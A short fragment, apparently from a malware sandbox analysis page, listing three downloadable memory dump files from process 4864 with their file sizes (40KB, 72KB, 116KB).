Download
memory/4864-597-0x00000000023B0000-0x00000000023BA000-memory.dmp

Filesize
40KB

Download
memory/4864-606-0x0000000002400000-0x0000000002412000-memory.dmp

Filesize
72KB

Download
memory/4864-610-0x0000000180000000-0x000000018001D000-memory.dmp

Filesize
116KB

Download